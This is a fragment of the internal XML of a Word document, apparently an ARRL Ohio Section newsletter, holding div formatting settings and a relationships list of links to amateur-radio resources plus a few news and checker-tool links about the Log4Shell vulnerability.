                      </w:divBdr>
                    </w:div>
                  </w:divsChild>
                </w:div>
                <w:div w:id="2063553736">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1765151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8232804">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2128810289">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="526870438">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2130198276">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2130472034">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1280378427">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2131967907">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2136874094">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2138720788">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2142184040">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2143961499">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2144691511">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2145539869">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="207565672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qrznow.com/category/dxing" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/huntresslabs/log4shell-tester" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.k8jtk.org/2015/04/16/getting-started-with-mmsstv/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:KD8IDJ@ARRL.NET" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/arrl-magazines" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/contests/club-news" TargetMode="External"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dailydx.com/" TargetMode="External"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nraubaltic.eu" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/find-an-amateur-radio-license-exam-session" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:webmaster@arrl-ohio.org" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dxmarathon.com/Rules/2021/2021%20Rules.htm" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://groups.io/g/OpenDV/topic/87695568" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.k8jtk.org/2020/10/25/ohio-section-journal-the-technical-coordinator-october-2020-edition/" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.jpeg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.jpeg"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://3.bp.blogspot.com/-Eveu-8X9f0w/Ut0MkVkKqzI/AAAAAAAAAKc/VD3GHxhphjMDM4ZFDj1_N12mc9cZ3L0GQCPcBGAYYCw/s1600/w8erw1.jpg" TargetMode="External"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:k8zt@arrl.net" TargetMode="External"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/arrl-sanctioned-events" TargetMode="External"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cfarc.org" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://drive.google.com/file/d/1INWqcXsoI159YfdyjoUKuFeUKnOzskvU/view?usp=sharing" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/on-the-air-podcast" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/qst-in-depth" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/rtty-roundup" TargetMode="External"/><Relationship Id="rId181" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.winterfieldday.com" TargetMode="External"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://arrl-ohio.org" TargetMode="External"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/rubo77/log4j_checker_beta" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://montreal.ctvnews.ca/quebec-shuts-down-3-992-websites-as-preventative-measure-after-security-flaw-discovered-1.5704258" TargetMode="External"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.google.com/store/apps/details?id=com.wolphi.sstv&amp;hl=en&amp;gl=US" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.n2yo.com/" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://1.bp.blogspot.com/-EG_Xqh_evas/UyuA_kvMxCI/AAAAAAAAAUE/lcfScCkujikdHwKK82BiGsVycw9fAmp2QCPcBGAYYCw/s1600/wa3ezn1.jpg" TargetMode="External"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpeg"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.k8zt.com/news/dx-dx-news" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/class" TargetMode="External"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpg"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/files/file/QST/PageSuite/UserGuide.pdf" TargetMode="External"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:k8zt@arrl.net" TargetMode="External"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.jpeg"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ft8activity.eu/index.php/en" TargetMode="External"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://bartg.org.uk/wp/contests" TargetMode="External"/><Relationship Id="rId192" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpeg"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:WB8LCD@ARRL.ORG" TargetMode="External"/><Relationship Id="rId206" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://arstechnica.com/information-technology/2021/12/as-log4shell-wreaks-havoc-payroll-service-reports-ransomware-attack/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pistar.uk/info_how.php" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.jpg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.jpeg"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dxmarathon.com/" TargetMode="External"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dxmarathon.com/Submission/2021/Submission2021.htm" TargetMode="External"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://r20.rs6.net/tn.jsp?f=001kx5LN97YU-UGY6wF-L9xyRT4tmgqlzjxuGHwmsuBNm8XBnonjzPaaq9A3ryfUvklXOZkZSBmT3js9a1Ose38TTVfunQB-Q201eX0HVWmc6TAE9oE-TO7BfrGTtUR44kWUq8RQJqAJXDo5iUZDq-y4bKBJplRut4iGqfde7JGRcQPcdX1EvdVrsjiqeHFtEWvYUJ3cSg1wvqd34JjbAg9trqHHcH_DF0O&amp;c=kIpQD25qoHRFhdQ2Ba0o4VJit1Q8gxDADc3pnXrdnw0vk5KjM7QNXw==&amp;ch=KK331ObtITjHCwnv2Bbfvk2eKOHB9kUpS_A3tEmvib6gk_PboRtDRA==" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/hamfest-convention-application" TargetMode="External"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://youtu.be/jqn4pd1a75c" TargetMode="External"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.pcmag.com/how-to/how-to-upgrade-your-laptop-a-part-by-part-guide" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.jpeg"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/eclectic" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/digital-qst-faq" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:webmaster@arrl-ohio.org" TargetMode="External"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://tiny.cc/beaham" TargetMode="External"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.contestcalendar.com/" TargetMode="External"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.eucw.org/eu160.html" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://arrl-ohio.org/SEC/Ohio_EMA_Training_List_Feb_2021.pdf"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5.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://issues.apache.org/jira/browse/LOG4J2-313" TargetMode="External"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.astroviewer.net/iss/en/" TargetMode="External"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ng3k.com/Misc/adxo.html" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://apps.apple.com/us/app/sstv-slow-scan-tv/id387910013" TargetMode="External"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.jpeg"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/hamfests" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/exam" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:exams.w8bi@gmail.com" TargetMode="External"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dxmarathon.com/" TargetMode="External"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ncjweb.com/naqp" TargetMode="External"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpeg"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ha-dx.com/en/contest-rules" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atara-w8atr.fun" TargetMode="External"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://arrl-ohio.org/news/index.html" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.jpg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_HTTP_status_codes" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.jpeg"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dxmarathon.com/helpfulhints/2021/HelpfulHints2021.htm" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://groups.io/g/Ham-Pi/topic/87750423" TargetMode="External"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.jpeg"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.ohsimplex.org/" TargetMode="External"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:w8erw@arrl.net" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/qexfiles" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dxmarathon.com/logupload.htm" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://software.ad1c.us/marathon/index.html" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpeg"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:k8zt@arrl.net" TargetMode="External"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.google.com/presentation/d/e/2PACX-1vQU9aeMBjS5jeJn_Zz5bpxiFNKOdGkGePYGbXe_hk96aE2iabOZWtFcn4ONEdqMwsdnR6KTUQ4_jWNK/pub?start=false&amp;loop=false&amp;delayms=3000" TargetMode="External"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ybdxcontest.com" TargetMode="External"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/straight-key-night" TargetMode="External"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/user/ARRLHQ" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ukeicc.com/80m-rules.php" TargetMode="External"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:highlandara@gmail.com" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ariss-sstv.blogspot.com/2021/12/ariss-end-of-year-sstv.html" TargetMode="External"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://gpredict.oz9aec.net/" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:wa3ezn@att.net" TargetMode="External"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/ota-sample" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.dx-world.net/" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.arrl.org/hamfests" TargetMode="External"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:k9el@dxmarathon.com" TargetMode="External"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ukeicc.com/80m-rules.php" TargetMode="External"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.jpeg"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://atara-w8atr.fun" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ncjweb.com/naqp" TargetMode="External"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpeg"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://arrl-ohio.org/sm/s-s.html" TargetMode="External"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://arrl-ohio.org/news/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://knowyourmeme.com/memes/404" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:k8jtk@arrl.net" TargetMode="External"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpg"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:john.ross3@att.net" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.amazon.com/dp/B01MSZ2N7R/ref=sr_1_1?s=mobile-apps&amp;ie=UTF8&amp;qid=1481816221&amp;sr=1-1&amp;keywords=qst" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dxmarathon.com/submissionlist.php" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 